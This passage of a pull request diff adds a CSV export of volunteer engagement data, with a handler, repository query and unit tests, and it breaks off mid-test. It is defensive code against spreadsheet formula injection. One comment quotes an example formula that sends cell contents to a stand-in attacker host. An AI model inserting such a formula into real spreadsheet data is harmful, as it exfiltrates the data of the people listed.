### PR TITLE
feat: add CSV engagement export for organizers

### DIFF
--- a/README.md
+++ b/README.md
@@ -58,6 +58,7 @@ The app itself is served in German by default, since Einsatzbereit's primary aud
 - **Organization invitations** to join and manage an organization's membership.
 - **Reporting and moderation** for opportunities, organizations, and users, backed by a full admin audit log.
 - **Image uploads** for avatars, organization logos, and opportunity banners, stored in MinIO object storage.
+- **CSV export** of an organization's engagement data.
 - **Installable as a PWA** with offline support for previously visited pages.
 
 ---

--- a/backend/src/Api/Engagements/ExportEngagements/v1/ExportEngagementsEndpoint.cs
+++ b/backend/src/Api/Engagements/ExportEngagements/v1/ExportEngagementsEndpoint.cs
@@ -1,0 +1,55 @@
+using System.Security.Claims;
+using System.Text;
+using Api.Common.Authentication;
+using Api.Common.Endpoints;
+using Api.Common.RateLimiting;
+using Application.Common.Exceptions;
+using Application.Common.Messaging;
+using Application.Engagements.ExportEngagements.v1;
+using Domain.Primitives;
+using Domain.Users;
+using Domain.VolunteerOpportunities;
+using Microsoft.AspNetCore.Mvc;
+
+namespace Api.Engagements.ExportEngagements.v1;
+
+internal sealed class ExportEngagementsEndpoint : IEndpoint
+{
+	public void MapEndpoint(IEndpointRouteBuilder app) =>
+		app.MapGet("/volunteer-opportunities/{opportunityId:guid}/engagements/export", ExportEngagementsAsync)
+			.WithName("ExportEngagements")
+			.WithTags("Engagements")
+			.Produces(StatusCodes.Status200OK, contentType: "text/csv")
+			.ProducesProblem(StatusCodes.Status401Unauthorized)
+			.ProducesProblem(StatusCodes.Status403Forbidden)
+			.ProducesProblem(StatusCodes.Status404NotFound)
+			.ProducesProblem(StatusCodes.Status500InternalServerError)
+			.RequireAuthorization(AuthorizationPolicies.EinsatzbereitOrganisatorPolicy)
+			.RequireRateLimiting(RateLimitingPolicies.Read)
+			.MapToApiVersion(1);
+
+	private static async Task<IResult> ExportEngagementsAsync(
+		[FromRoute] Guid opportunityId,
+		[FromServices] ISender sender,
+		ClaimsPrincipal user,
+		CancellationToken cancellationToken)
+	{
+		var userId = Guid.TryParse(user.FindFirstValue("sub"), out var uid)
+			? UserId.Create(uid).GetValueOrThrow()
+			: throw new ResultFailureException(Error.Validation("User.InvalidId", "Invalid user."));
+
+		var file = await sender.Send(
+			new ExportEngagementsQuery(VolunteerOpportunityId.Create(opportunityId).GetValueOrThrow(), userId),
+			cancellationToken);
+
+		// A UTF-8 BOM (#1675) - without it, Excel on a German Windows install
+		// guesses the ANSI codepage instead of UTF-8 and mangles every umlaut
+		// ("Müller" -> "MÃ¼ller") in a volunteer's name.
+		byte[] bytes = [.. Encoding.UTF8.GetPreamble(), .. Encoding.UTF8.GetBytes(file.Content)];
+
+		return Results.File(
+			bytes,
+			contentType: "text/csv; charset=utf-8",
+			fileDownloadName: file.FileName);
+	}
+}

--- a/backend/src/Api/wwwroot/openapi-v1.json
+++ b/backend/src/Api/wwwroot/openapi-v1.json
@@ -6283,6 +6283,70 @@
         }
       }
     },
+    "/v1/volunteer-opportunities/{opportunityId}/engagements/export": {
+      "get": {
+        "tags": [
+          "Engagements"
+        ],
+        "operationId": "ExportEngagements",
+        "parameters": [
+          {
+            "name": "opportunityId",
+            "in": "path",
+            "required": true,
+            "schema": {
+              "type": "string",
+              "format": "uuid"
+            }
+          }
+        ],
+        "responses": {
+          "200": {
+            "description": "OK"
+          },
+          "401": {
+            "description": "Unauthorized",
+            "content": {
+              "application/problem+json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ProblemDetails"
+                }
+              }
+            }
+          },
+          "403": {
+            "description": "Forbidden",
+            "content": {
+              "application/problem+json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ProblemDetails"
+                }
+              }
+            }
+          },
+          "404": {
+            "description": "Not Found",
+            "content": {
+              "application/problem+json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ProblemDetails"
+                }
+              }
+            }
+          },
+          "500": {
+            "description": "Internal Server Error",
+            "content": {
+              "application/problem+json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ProblemDetails"
+                }
+              }
+            }
+          }
+        }
+      }
+    },
     "/v1/engagements/{engagementId}/confirm": {
       "post": {
         "tags": [

--- a/backend/src/Application/Engagements/EngagementExportFile.cs
+++ b/backend/src/Application/Engagements/EngagementExportFile.cs
@@ -1,0 +1,3 @@
+namespace Application.Engagements;
+
+public sealed record EngagementExportFile(string FileName, string Content);

--- a/backend/src/Application/Engagements/ExportEngagements/v1/ExportEngagementsQuery.cs
+++ b/backend/src/Application/Engagements/ExportEngagements/v1/ExportEngagementsQuery.cs
@@ -1,0 +1,8 @@
+using Application.Common.Messaging;
+using Domain.Users;
+using Domain.VolunteerOpportunities;
+
+namespace Application.Engagements.ExportEngagements.v1;
+
+public sealed record ExportEngagementsQuery(VolunteerOpportunityId OpportunityId, UserId RequestingUserId)
+	: IQuery<EngagementExportFile>;

--- a/backend/src/Application/Engagements/ExportEngagements/v1/ExportEngagementsQueryHandler.cs
+++ b/backend/src/Application/Engagements/ExportEngagements/v1/ExportEngagementsQueryHandler.cs
@@ -1,0 +1,171 @@
+using System.Globalization;
+using System.Text;
+using Application.Common.Authorization;
+using Application.Common.Exceptions;
+using Application.Common.Keycloak;
+using Application.Common.Localization;
+using Application.Common.Messaging;
+using Application.Common.Persistence;
+using Domain.Primitives;
+
+namespace Application.Engagements.ExportEngagements.v1;
+
+internal sealed class ExportEngagementsQueryHandler(
+	IEngagementReadRepository readRepository,
+	IApplicationDbContext dbContext,
+	IKeycloakUserService keycloakUserService)
+	: IQueryHandler<ExportEngagementsQuery, EngagementExportFile>
+{
+	private static readonly TimeZoneInfo BerlinTimeZone = TimeZoneInfo.FindSystemTimeZoneById("Europe/Berlin");
+
+	public async ValueTask<EngagementExportFile> Handle(
+		ExportEngagementsQuery request,
+		CancellationToken cancellationToken = default)
+	{
+		var opportunity = await dbContext.VolunteerOpportunities.FindAsync(request.OpportunityId, cancellationToken)
+			?? throw new ResultFailureException(Error.NotFound("VolunteerOpportunity.NotFound", $"Volunteer opportunity '{request.OpportunityId.Value}' not found."));
+
+		await OwnershipGuard.EnsureIsOrganizerAsync(
+			dbContext,
+			opportunity.OrganizationId.Value,
+			request.RequestingUserId,
+			cancellationToken);
+
+		var engagements = await readRepository.GetForExportAsync(request.OpportunityId, cancellationToken);
+
+		var volunteerIds = engagements
+			.Where(e => e.VolunteerId is not null)
+			.Select(e => e.VolunteerId!.Value)
+			.Distinct()
+			.ToList();
+		var profileMap = await keycloakUserService.GetUserProfilesAsync(volunteerIds, cancellationToken);
+
+		var requestingUser = (await dbContext.GetOrCreateUsersAsync([request.RequestingUserId], cancellationToken))[0];
+		var language = SupportedLanguages.Resolve(requestingUser.PreferredLanguage);
+
+		var content = BuildCsv(engagements, profileMap, language);
+		return new EngagementExportFile($"engagements-{request.OpportunityId.Value}.csv", content);
+	}
+
+	private static string BuildCsv(
+		List<EngagementSummary> engagements,
+		IReadOnlyDictionary<Guid, KeycloakUserProfile> profileMap,
+		string language)
+	{
+		const string delimiter = ";";
+
+		// CRLF line endings explicitly (RFC 4180), not StringBuilder.AppendLine's
+		// Environment.NewLine - a CSV built on Linux CI must byte-for-byte match
+		// one built on a Windows dev machine, and Excel/other spreadsheet tools
+		// expect CRLF regardless of which OS generated the file.
+		var sb = new StringBuilder();
+
+		// Excel honors this directive line regardless of the running install's own
+		// regional list-separator setting (#1675) - without it, a German Windows
+		// Excel expecting ";" silently collapses a comma-delimited file into a
+		// single column. Emitted unconditionally, with the delimiter itself
+		// switched to ";" to match, so this fixes the German case without
+		// affecting how an English-locale Excel reads the same file.
+		sb.Append("sep=;\r\n");
+		sb.Append(string.Join(delimiter, Header(language))).Append("\r\n");
+
+		foreach (var e in engagements)
+		{
+			var row = new[]
+			{
+				ResolveName(e, profileMap, language),
+				TranslateStatus(e.Status, language),
+				FormatTimeSlot(e.TimeSlotStartDateTime, e.TimeSlotEndDateTime),
+				e.IsCheckedIn ? CheckedInLabel(language) : NotCheckedInLabel(language),
+				e.FeedbackRating?.ToString(CultureInfo.InvariantCulture) ?? "",
+			};
+			sb.Append(string.Join(delimiter, row.Select(v => CsvEscape(v, delimiter)))).Append("\r\n");
+		}
+
+		return sb.ToString();
+	}
+
+	// The time slot column names its zone explicitly rather than per-row (see
+	// FormatBerlinTime) - simpler than a per-row MEZ/MESZ abbreviation and just
+	// as unambiguous.
+	private static string[] Header(string language) => language == "de"
+		? ["Name", "Status", "Zeitslot (Europe/Berlin)", "Check-in-Status", "Feedback-Bewertung"]
+		: ["Name", "Status", "Time Slot (Europe/Berlin)", "Check-in Status", "Feedback Rating"];
+
+	private static string TranslateStatus(string status, string language) => language == "de"
+		? status switch
+		{
+			"Pending" => "Ausstehend",
+			"Confirmed" => "Bestätigt",
+			"Cancelled" => "Abgesagt",
+			"Withdrawn" => "Zurückgezogen",
+			_ => status,
+		}
+		: status;
+
+	private static string CheckedInLabel(string language) => language == "de" ? "Eingecheckt" : "Checked in";
+
+	private static string NotCheckedInLabel(string language) => language == "de" ? "Nicht eingecheckt" : "Not checked in";
+
+	private static string ResolveName(
+		EngagementSummary e, IReadOnlyDictionary<Guid, KeycloakUserProfile> profileMap, string language)
+	{
+		if (e.VolunteerId is not Guid volunteerId)
+			return language == "de" ? "Anonymisierte:r Freiwillige:r" : "Anonymized volunteer";
+
+		if (!profileMap.TryGetValue(volunteerId, out var profile))
+			return FallbackVolunteerLabel(volunteerId, language);
+
+		var name = profile.FirstName is not null || profile.LastName is not null
+			? $"{profile.FirstName} {profile.LastName}".Trim()
+			: profile.Username;
+
+		return string.IsNullOrWhiteSpace(name) ? FallbackVolunteerLabel(volunteerId, language) : name;
+	}
+
+	private static string FallbackVolunteerLabel(Guid volunteerId, string language) =>
+		language == "de" ? $"Freiwillige:r {volunteerId}" : $"Volunteer {volunteerId}";
+
+	private static string FormatTimeSlot(DateTimeOffset? start, DateTimeOffset? end)
+	{
+		if (start is null)
+			return "";
+
+		var startText = FormatBerlinTime(start.Value);
+		if (end is null)
+			return startText;
+
+		return $"{startText} - {FormatBerlinTime(end.Value)}";
+	}
+
+	// No per-opportunity timezone is stored (same Europe/Berlin fallback used
+	// throughout this codebase - see EngagementReminderDueHandler.FormatStart's
+	// own comment) - converts from UTC rather than leaving it raw, since that's
+	// what an organizer's own browser (defaulting to its local timezone, almost
+	// always this one for this product's userbase) already shows them on screen.
+	private static string FormatBerlinTime(DateTimeOffset instant) =>
+		TimeZoneInfo.ConvertTime(instant, BerlinTimeZone).ToString("yyyy-MM-dd HH:mm", CultureInfo.InvariantCulture);
+
+	// Spreadsheet apps (Excel, LibreOffice, Google Sheets) treat a cell starting
+	// with =, +, -, @, tab, or CR as a formula to evaluate (CWE-1236) - the Name
+	// column is built from a volunteer's Keycloak first/last name (ResolveName
+	// above), which is fully caller-controlled free text, e.g.
+	// =HYPERLINK("https://attacker.example/?d="&A2,"click") (#1678). Prefixing
+	// with a single quote forces the cell to be read as literal text instead.
+	private static readonly char[] FormulaInjectionLeadChars = ['=', '+', '-', '@', '\t', '\r'];
+
+	// RFC 4180: only quote (and escape embedded quotes in) a field that actually
+	// needs it - a volunteer's name could contain the delimiter, a quote, or a
+	// newline that would otherwise break the CSV's column boundaries.
+	private static string CsvEscape(string value, string delimiter)
+	{
+		var sanitized = value.Length > 0 && FormulaInjectionLeadChars.Contains(value[0])
+			? $"'{value}"
+			: value;
+
+		if (sanitized.IndexOfAny(['"', '\n', '\r']) < 0 && !sanitized.Contains(delimiter))
+			return sanitized;
+
+		return $"\"{sanitized.Replace("\"", "\"\"")}\"";
+	}
+}

--- a/backend/src/Application/Engagements/IEngagementReadRepository.cs
+++ b/backend/src/Application/Engagements/IEngagementReadRepository.cs
@@ -77,6 +77,16 @@ public interface IEngagementReadRepository
 		int pageSize,
 		CancellationToken cancellationToken = default);
 
+	/// <summary>
+	/// Every engagement for the opportunity, unpaginated, with the live TimeSlot join
+	/// (falling back to the engagement's own snapshot, same rule as <see cref="GetByVolunteerAsync"/>)
+	/// and <see cref="EngagementSummary.FeedbackRating"/> populated - fields the paginated
+	/// organizer list doesn't need but the CSV roster export does.
+	/// </summary>
+	ValueTask<List<EngagementSummary>> GetForExportAsync(
+		VolunteerOpportunityId opportunityId,
+		CancellationToken cancellationToken = default);
+
 	ValueTask<EngagementCalendarInfo?> GetCalendarInfoAsync(
 		EngagementId engagementId,
 		CancellationToken cancellationToken = default);

--- a/backend/src/Application/Notifications/OpportunityNotificationHelper.cs
+++ b/backend/src/Application/Notifications/OpportunityNotificationHelper.cs
@@ -60,9 +60,9 @@ internal static class OpportunityNotificationHelper
 		// Batched instead of one GetUserAsync call per volunteer (#1678) - this runs
 		// inside TransactionPipelineBehavior's DB transaction (see callers), so an N+1
 		// here held row locks open for N sequential outbound Keycloak calls. Mirrors
-		// the GetUserProfilesAsync usage in GetEngagementsQueryHandler; a volunteer
-		// whose lookup fails (e.g. deleted in Keycloak) is silently skipped rather
-		// than aborting the whole batch.
+		// the GetUserProfilesAsync usage in GetEngagementsQueryHandler/
+		// ExportEngagementsQueryHandler; a volunteer whose lookup fails (e.g. deleted
+		// in Keycloak) is silently skipped rather than aborting the whole batch.
 		var profileMap = await keycloakUserService.GetUserProfilesAsync(volunteerIds, cancellationToken);
 
 		var messages = new List<EmailMessage>(volunteerIds.Count);

--- a/backend/src/Infrastructure/Persistence/Repositories/EngagementReadRepository.cs
+++ b/backend/src/Infrastructure/Persistence/Repositories/EngagementReadRepository.cs
@@ -462,6 +462,59 @@ internal sealed class EngagementReadRepository(
 		return string.Join(", ", parts);
 	}
 
+	public async ValueTask<List<EngagementSummary>> GetForExportAsync(
+		VolunteerOpportunityId opportunityId,
+		CancellationToken cancellationToken = default)
+	{
+		var raw = await (
+			from e in dbContext.EngagementsQuery
+			where e.OpportunityId == opportunityId
+			join o in dbContext.VolunteerOpportunitiesQuery on e.OpportunityId equals o.Id
+			join org in dbContext.OrganizationsQuery on o.OrganizationId equals org.Id
+			join ts in dbContext.TimeSlotsQuery on e.TimeSlotId equals ts.Id into tsGroup
+			from ts in tsGroup.DefaultIfEmpty()
+			select new
+			{
+				e.Id,
+				e.OpportunityId,
+				o.Title,
+				OrganizationId = org.Id,
+				OrganizationName = org.Name,
+				e.VolunteerId,
+				e.TimeSlotId,
+				e.Message,
+				e.Status,
+				e.IsCheckedIn,
+				e.FeedbackRating,
+				e.FeedbackSubmittedAt,
+				e.CreatedOn,
+				e.CancellationReason,
+				TimeSlotStart = (DateTimeOffset?)ts.StartDateTime ?? e.TimeSlotStartDateTime,
+				TimeSlotEnd = (DateTimeOffset?)ts.EndDateTime ?? e.TimeSlotEndDateTime,
+			})
+			.OrderBy(x => x.TimeSlotStart ?? DateTimeOffset.MaxValue)
+			.ThenBy(x => x.CreatedOn)
+			.ToListAsync(cancellationToken);
+
+		return raw.Select(x => new EngagementSummary(
+			x.Id.Value,
+			x.OpportunityId.Value,
+			x.Title,
+			x.OrganizationId.Value,
+			x.OrganizationName,
+			x.VolunteerId?.Value,
+			x.TimeSlotId?.Value,
+			x.Message,
+			x.Status.ToString(),
+			x.IsCheckedIn,
+			x.FeedbackSubmittedAt.HasValue,
+			x.CreatedOn,
+			TimeSlotStartDateTime: x.TimeSlotStart,
+			TimeSlotEndDateTime: x.TimeSlotEnd,
+			CancellationReason: x.CancellationReason,
+			FeedbackRating: x.FeedbackRating)).ToList();
+	}
+
 	public async ValueTask<EngagementCalendarInfo?> GetCalendarInfoAsync(
 		EngagementId engagementId,
 		CancellationToken cancellationToken = default)

--- a/backend/tests/Application.UnitTests/Engagements/ExportEngagements/ExportEngagementsQueryHandlerTests.cs
+++ b/backend/tests/Application.UnitTests/Engagements/ExportEngagements/ExportEngagementsQueryHandlerTests.cs
@@ -1,0 +1,516 @@
+using Application.Common.Exceptions;
+using Application.Common.Keycloak;
+using Application.Common.Persistence;
+using Application.Engagements;
+using Application.Engagements.ExportEngagements.v1;
+using AwesomeAssertions;
+using Domain.Common;
+using Domain.Organizations;
+using Domain.Primitives;
+using Domain.Users;
+using Domain.VolunteerOpportunities;
+using NSubstitute;
+
+namespace Application.UnitTests.Engagements.ExportEngagements;
+
+public class ExportEngagementsQueryHandlerTests
+{
+	private readonly IApplicationDbContext _dbContext = Substitute.For<IApplicationDbContext>();
+	private readonly IAggregateRepository<VolunteerOpportunity, VolunteerOpportunityId> _opportunityRepo =
+		Substitute.For<IAggregateRepository<VolunteerOpportunity, VolunteerOpportunityId>>();
+	private readonly IEngagementReadRepository _readRepository = Substitute.For<IEngagementReadRepository>();
+	private readonly IKeycloakUserService _keycloakUserService = Substitute.For<IKeycloakUserService>();
+	private readonly ExportEngagementsQueryHandler _sut;
+
+	private static readonly UserId DefaultRequestingUserId = UserId.New();
+	private static readonly OrganizationId DefaultOrgId = OrganizationId.New();
+	private static readonly Address DefaultAddress = Address.Create("Teststraße", "1", "12345", "Berlin").Value;
+	private static readonly VolunteerOpportunityId DefaultOpportunityId = VolunteerOpportunityId.New();
+
+	public ExportEngagementsQueryHandlerTests()
+	{
+		_dbContext.VolunteerOpportunities.Returns(_opportunityRepo);
+		_opportunityRepo
+			.FindAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns(CreateDefaultOpportunity());
+		_dbContext
+			.IsOrganizerAsync(Arg.Any<OrganizationId>(), Arg.Any<UserId>(), Arg.Any<CancellationToken>())
+			.Returns(true);
+		_readRepository
+			.GetForExportAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns([]);
+		_keycloakUserService
+			.GetUserProfilesAsync(Arg.Any<IReadOnlyList<Guid>>(), Arg.Any<CancellationToken>())
+			.Returns(new Dictionary<Guid, KeycloakUserProfile>());
+		// Defaults the requesting organizer to English so every test not
+		// specifically about localization keeps asserting the English labels
+		// below - Handle_ShouldLocalizeHeaderStatusAndLabels_... below is the
+		// one exercising the German branch.
+		_dbContext.GetOrCreateUsersAsync(Arg.Any<IReadOnlyCollection<UserId>>(), Arg.Any<CancellationToken>())
+			.Returns(call =>
+			{
+				var requestingUser = User.Create(((IReadOnlyCollection<UserId>)call[0]!).First());
+				requestingUser.SetPreferredLanguage("en");
+				return new List<User> { requestingUser };
+			});
+		_sut = new ExportEngagementsQueryHandler(_readRepository, _dbContext, _keycloakUserService);
+	}
+
+	[Test]
+	public async Task Handle_ShouldThrow_WhenOpportunityNotFound(
+		CancellationToken cancellationToken)
+	{
+		_opportunityRepo
+			.FindAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns((VolunteerOpportunity?)null);
+
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		Func<Task> act = async () => await _sut.Handle(query, cancellationToken);
+
+		(await act.Should().ThrowAsync<ResultFailureException>())
+			.Which.Error.Type.Should().Be(ErrorType.NotFound);
+	}
+
+	[Test]
+	public async Task Handle_ShouldThrow_WhenRequestingUserIsNotOrganizer(
+		CancellationToken cancellationToken)
+	{
+		_dbContext
+			.IsOrganizerAsync(Arg.Any<OrganizationId>(), Arg.Any<UserId>(), Arg.Any<CancellationToken>())
+			.Returns(false);
+
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		Func<Task> act = async () => await _sut.Handle(query, cancellationToken);
+
+		(await act.Should().ThrowAsync<ResultFailureException>())
+			.Which.Error.Type.Should().Be(ErrorType.Forbidden);
+	}
+
+	[Test]
+	public async Task Handle_ShouldNameFileAfterOpportunityId(
+		CancellationToken cancellationToken)
+	{
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		var file = await _sut.Handle(query, cancellationToken);
+
+		file.FileName.Should().Be($"engagements-{DefaultOpportunityId.Value}.csv");
+	}
+
+	[Test]
+	public async Task Handle_ShouldReturnSepDirectiveAndHeaderOnly_WhenNoEngagements(
+		CancellationToken cancellationToken)
+	{
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		var file = await _sut.Handle(query, cancellationToken);
+
+		// The leading "sep=;" line (#1675) tells Excel to use ";" as the column
+		// delimiter regardless of the running install's own regional settings.
+		file.Content.Should().Be(
+			"sep=;\r\nName;Status;Time Slot (Europe/Berlin);Check-in Status;Feedback Rating\r\n");
+	}
+
+	[Test]
+	public async Task Handle_ShouldIncludeResolvedName_TimeSlot_CheckIn_AndFeedbackRating_ForACompleteRow(
+		CancellationToken cancellationToken)
+	{
+		var volunteerId = Guid.NewGuid();
+		var start = new DateTimeOffset(2026, 8, 10, 9, 0, 0, TimeSpan.Zero);
+		var end = new DateTimeOffset(2026, 8, 10, 12, 0, 0, TimeSpan.Zero);
+		var engagement = new EngagementSummary(
+			Guid.NewGuid(),
+			DefaultOpportunityId.Value,
+			"Test Opportunity",
+			DefaultOrgId.Value,
+			"Test Org",
+			volunteerId,
+			Guid.NewGuid(),
+			null,
+			"Confirmed",
+			IsCheckedIn: true,
+			HasFeedback: true,
+			DateTimeOffset.UtcNow,
+			TimeSlotStartDateTime: start,
+			TimeSlotEndDateTime: end,
+			FeedbackRating: 5);
+
+		_readRepository
+			.GetForExportAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns([engagement]);
+		_keycloakUserService
+			.GetUserProfilesAsync(Arg.Any<IReadOnlyList<Guid>>(), Arg.Any<CancellationToken>())
+			.Returns(new Dictionary<Guid, KeycloakUserProfile>
+			{
+				[volunteerId] = new KeycloakUserProfile(volunteerId, "vera", "Vera", "Volunteer", "vera@example.com"),
+			});
+
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		var file = await _sut.Handle(query, cancellationToken);
+
+		// 09:00-12:00 UTC on an August date is 11:00-14:00 in Europe/Berlin (CEST, UTC+2).
+		file.Content.Should().Contain("Vera Volunteer;Confirmed;2026-08-10 11:00 - 2026-08-10 14:00;Checked in;5");
+	}
+
+	[Test]
+	public async Task Handle_ShouldConvertTimeSlotStart_FromUtcToEuropeBerlin_NotLeaveItRawUtc(
+		CancellationToken cancellationToken)
+	{
+		// A winter instant makes Europe/Berlin deterministically UTC+1 (CET, no
+		// DST) regardless of when this test runs - mirrors
+		// EngagementReminderDueHandlerTests' own approach to the same fallback.
+		var start = new DateTimeOffset(2027, 1, 15, 12, 0, 0, TimeSpan.Zero);
+		var engagement = new EngagementSummary(
+			Guid.NewGuid(),
+			DefaultOpportunityId.Value,
+			"Test Opportunity",
+			DefaultOrgId.Value,
+			"Test Org",
+			VolunteerId: null,
+			TimeSlotId: null,
+			Message: null,
+			"Confirmed",
+			IsCheckedIn: false,
+			HasFeedback: false,
+			DateTimeOffset.UtcNow,
+			TimeSlotStartDateTime: start,
+			TimeSlotEndDateTime: null);
+
+		_readRepository
+			.GetForExportAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns([engagement]);
+
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		var file = await _sut.Handle(query, cancellationToken);
+
+		file.Content.Should().Contain("2027-01-15 13:00").And.NotContain("12:00");
+	}
+
+	[Test]
+	public async Task Handle_ShouldFallBackToUsername_WhenKeycloakProfileHasNoName(
+		CancellationToken cancellationToken)
+	{
+		var volunteerId = Guid.NewGuid();
+		var engagement = new EngagementSummary(
+			Guid.NewGuid(),
+			DefaultOpportunityId.Value,
+			"Test Opportunity",
+			DefaultOrgId.Value,
+			"Test Org",
+			volunteerId,
+			null,
+			null,
+			"Pending",
+			IsCheckedIn: false,
+			HasFeedback: false,
+			DateTimeOffset.UtcNow);
+
+		_readRepository
+			.GetForExportAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns([engagement]);
+		_keycloakUserService
+			.GetUserProfilesAsync(Arg.Any<IReadOnlyList<Guid>>(), Arg.Any<CancellationToken>())
+			.Returns(new Dictionary<Guid, KeycloakUserProfile>
+			{
+				[volunteerId] = new KeycloakUserProfile(volunteerId, "vera", null, null, "vera@example.com"),
+			});
+
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		var file = await _sut.Handle(query, cancellationToken);
+
+		file.Content.Should().Contain("vera;Pending");
+	}
+
+	[Test]
+	public async Task Handle_ShouldFallBackToVolunteerId_WhenKeycloakLookupFailsForVolunteer(
+		CancellationToken cancellationToken)
+	{
+		var volunteerId = Guid.NewGuid();
+		var engagement = new EngagementSummary(
+			Guid.NewGuid(),
+			DefaultOpportunityId.Value,
+			"Test Opportunity",
+			DefaultOrgId.Value,
+			"Test Org",
+			volunteerId,
+			null,
+			null,
+			"Pending",
+			IsCheckedIn: false,
+			HasFeedback: false,
+			DateTimeOffset.UtcNow);
+
+		_readRepository
+			.GetForExportAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns([engagement]);
+
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		var file = await _sut.Handle(query, cancellationToken);
+
+		file.Content.Should().Contain($"Volunteer {volunteerId}");
+	}
+
+	[Test]
+	public async Task Handle_ShouldUseAnonymizedVolunteerLabel_WhenVolunteerIdIsNull(
+		CancellationToken cancellationToken)
+	{
+		var engagement = new EngagementSummary(
+			Guid.NewGuid(),
+			DefaultOpportunityId.Value,
+			"Test Opportunity",
+			DefaultOrgId.Value,
+			"Test Org",
+			VolunteerId: null,
+			null,
+			null,
+			"Cancelled",
+			IsCheckedIn: false,
+			HasFeedback: false,
+			DateTimeOffset.UtcNow);
+
+		_readRepository
+			.GetForExportAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns([engagement]);
+
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		var file = await _sut.Handle(query, cancellationToken);
+
+		file.Content.Should().Contain("Anonymized volunteer;Cancelled");
+	}
+
+	[Test]
+	public async Task Handle_ShouldLeaveTimeSlotBlank_AndNotCheckedIn_AndBlankFeedbackRating_ForIndividualContactWithNoFeedback(
+		CancellationToken cancellationToken)
+	{
+		var engagement = new EngagementSummary(
+			Guid.NewGuid(),
+			DefaultOpportunityId.Value,
+			"Test Opportunity",
+			DefaultOrgId.Value,
+			"Test Org",
+			VolunteerId: null,
+			TimeSlotId: null,
+			Message: "Please let me help",
+			"Pending",
+			IsCheckedIn: false,
+			HasFeedback: false,
+			DateTimeOffset.UtcNow);
+
+		_readRepository
+			.GetForExportAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns([engagement]);
+
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		var file = await _sut.Handle(query, cancellationToken);
+
+		file.Content.Should().Contain("Anonymized volunteer;Pending;;Not checked in;\r\n");
+	}
+
+	[Test]
+	public async Task Handle_ShouldQuoteAndEscapeName_WhenItContainsAQuote(
+		CancellationToken cancellationToken)
+	{
+		var volunteerId = Guid.NewGuid();
+		var engagement = new EngagementSummary(
+			Guid.NewGuid(),
+			DefaultOpportunityId.Value,
+			"Test Opportunity",
+			DefaultOrgId.Value,
+			"Test Org",
+			volunteerId,
+			null,
+			null,
+			"Pending",
+			IsCheckedIn: false,
+			HasFeedback: false,
+			DateTimeOffset.UtcNow);
+
+		_readRepository
+			.GetForExportAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns([engagement]);
+		_keycloakUserService
+			.GetUserProfilesAsync(Arg.Any<IReadOnlyList<Guid>>(), Arg.Any<CancellationToken>())
+			.Returns(new Dictionary<Guid, KeycloakUserProfile>
+			{
+				[volunteerId] = new KeycloakUserProfile(volunteerId, "vera", "Vera \"The Helper\"", "Doe, Jr.", "vera@example.com"),
+			});
+
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		var file = await _sut.Handle(query, cancellationToken);
+
+		// The embedded quote still forces quoting/escaping - the embedded comma
+		// rides along inside those quotes but, unlike before #1675, no longer
+		// needs escaping on its own since ";" (not ",") is now the delimiter.
+		file.Content.Should().Contain("\"Vera \"\"The Helper\"\" Doe, Jr.\";Pending");
+	}
+
+	[Test]
+	public async Task Handle_ShouldNotEscapeAPlainComma_SinceSemicolonIsTheDelimiterNow(
+		CancellationToken cancellationToken)
+	{
+		var volunteerId = Guid.NewGuid();
+		var engagement = new EngagementSummary(
+			Guid.NewGuid(),
+			DefaultOpportunityId.Value,
+			"Test Opportunity",
+			DefaultOrgId.Value,
+			"Test Org",
+			volunteerId,
+			null,
+			null,
+			"Pending",
+			IsCheckedIn: false,
+			HasFeedback: false,
+			DateTimeOffset.UtcNow);
+
+		_readRepository
+			.GetForExportAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns([engagement]);
+		_keycloakUserService
+			.GetUserProfilesAsync(Arg.Any<IReadOnlyList<Guid>>(), Arg.Any<CancellationToken>())
+			.Returns(new Dictionary<Guid, KeycloakUserProfile>
+			{
+				[volunteerId] = new KeycloakUserProfile(volunteerId, "vera", "Doe, Jane", null, "vera@example.com"),
+			});
+
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		var file = await _sut.Handle(query, cancellationToken);
+
+		file.Content.Should().Contain("Doe, Jane;Pending").And.NotContain("\"Doe, Jane\"");
+	}
+
+	[Test]
+	public async Task Handle_ShouldQuoteAndEscapeName_WhenItContainsTheSemicolonDelimiter(
+		CancellationToken cancellationToken)
+	{
+		var volunteerId = Guid.NewGuid();
+		var engagement = new EngagementSummary(
+			Guid.NewGuid(),
+			DefaultOpportunityId.Value,
+			"Test Opportunity",
